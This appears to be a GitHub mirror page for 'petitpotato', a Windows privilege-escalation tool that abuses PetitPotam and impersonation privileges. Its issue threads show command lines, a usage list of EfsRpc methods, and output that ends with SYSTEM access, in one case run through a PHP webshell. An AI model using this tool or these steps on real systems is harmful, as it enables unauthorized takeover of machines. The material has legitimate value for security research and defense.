GithubHelp home page GithubHelp logo

wh0amitz / petitpotato Goto Github PK

View Code? Open in Web Editor NEW
394.0 6.0 51.0 137.92 MB

Local privilege escalation via PetitPotam (Abusing impersonate privileges).

C++ 4.16% C 95.84%
infosec redteam redteam-tools windows potato privilege-escalation

petitpotato's Introduction

WHOAMI

wh0amitz's github stats

PS C:\Users\whoami> whoami

I am just an ordinary student & offensive security researcher & hacker, and what I have learned basically comes from the information security community and my own research.

PS C:\Users\whoami> whoami /priv

  • Cyber Security: Web Security, Active Directory, Kerberos, Post Exploitation
  • Programmer: C/C++, C#, Python, JAVA, PHP, Nodejs.
  • CTF: Web.
  • Weapon: QSZ-92, Type 54 Pistol, NRP-9.

GitHub User's stars GitHub followers

petitpotato's People

Contributors

wh0amitz avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar

petitpotato's Issues

DuplicateToken error

Hello, when trying to use this i get the error message DupicateTokenEx() Error: 1346.
Here is the full log:

C:\Users\admin\Downloads\Programs>PetitPotato.exe 3 cmd.exe

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[-] DupicateTokenEx() Error: 1346.

Is there any reason why this is happening? Anything i can do to fix this? Love the work

Cant execute some commands

Hello!
Windows Server 2012 R2 Datacenter Edition Windows NT build 9600
command over phpwebshell -

$ testin.exe 3 whoami

[+] Malicious named pipe running on \.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
nt authority\system

(! seems it work . Thanks a lot)

but when i run
testin.exe 3 whoami /priv
or testin.exe 3 netsh winhttp set proxy tester:password1@ip:port
i recieve -

$ testin.exe 3 whoami /priv

Usage: testin.exe [EfsID] [Command]

The available EfsIDs are as follows:
[0] EfsRpcOpenFileRaw
[1] EfsRpcEncryptFileSrv
[2] EfsRpcDecryptFileSrv
[3] EfsRpcQueryUsersOnFile
[4] EfsRpcQueryRecoveryAgents
[5] EfsRpcRemoveUsersFromFile (Failed)
[6] EfsRpcAddUsersToFile
[7] EfsRpcFileKeyInfo
[8] EfsRpcDuplicateEncryptionInfoFile (Failed)
[9] EfsRpcAddUsersToFileEx
[10] EfsRpcFileKeyInfoEx (Failed)
[11] EfsRpcGetEncryptedFileMetadata (Failed)
[12] EfsRpcSetEncryptedFileMetadata (Failed)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.